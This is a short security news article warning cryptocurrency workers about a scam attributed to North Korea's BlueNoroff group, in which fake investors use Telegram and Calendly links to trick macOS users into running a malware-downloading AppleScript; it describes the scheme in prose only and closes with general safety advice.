Cryptocurrency enthusiasts should be on the lookout, as malicious hackers are leveraging popular scheduling applications like Calendly to execute sophisticated scams. Recent reports highlight a concerning trend where attackers impersonate established cryptocurrency investors, initiating meetings through Calendly, ultimately leading to the installation of malware on unsuspecting victims’ macOS systems.
The Calendly Con Explained
The modus operandi of this scam, as reported by Krebs On Security, involves hackers posing as legitimate investors and reaching out to individuals within the cryptocurrency space. These attackers utilize platforms like Telegram to establish contact with their targets. Once a rapport is established, the scammer requests a video conference call to discuss potential investment opportunities.
The Case Study
Let’s delve into a real-life example to understand the inner workings of this scam. Meet Doug, a representative of a startup seeking investment for a new blockchain platform. Doug, active on Telegram, was approached by an individual claiming to be Ian Lee from Signum Capital, a well-established investment firm based in Singapore.
Expressing interest in financially supporting Doug’s venture, “Lee” proposed scheduling a video call via Calendly. When the scheduled meeting time arrived, Doug faced technical issues with the meeting link provided. Despite troubleshooting attempts with “Lee” via Telegram, Doug ended up running a script as instructed, unwittingly installing malware on his Mac.
Upon analysis, the malicious script Doug executed was identified as a simple Apple Script (.scpt) designed to download and execute a trojan tailored for macOS systems. Unfortunately, Doug’s immediate response to the perceived threat—backing up documents, changing passwords, and reinstalling macOS—prevented forensic analysis of the malware.
macOS Malware Evolving
Further investigation revealed a connection to North Korean state-sponsored hackers, particularly the group known as BlueNoroff, a subgroup of the Lazarus hacking group. This phishing scheme exploits the “Add Custom Link” feature of Calendly to insert malicious links, facilitating phishing attacks targeting cryptocurrency projects.
While macOS systems historically faced fewer malware threats compared to Windows PCs, the landscape is evolving. Recent developments indicate a surge in information-stealing trojans aimed at macOS users, necessitating heightened vigilance and proactive security measures.
Protecting oneself from cryptocurrency scams requires a multi-faceted approach. Vigilance, skepticism towards unsolicited communications, and adherence to best security practices are paramount. Verifying the legitimacy of contacts, exercising caution when clicking links, and keeping software updated are crucial steps in mitigating risks.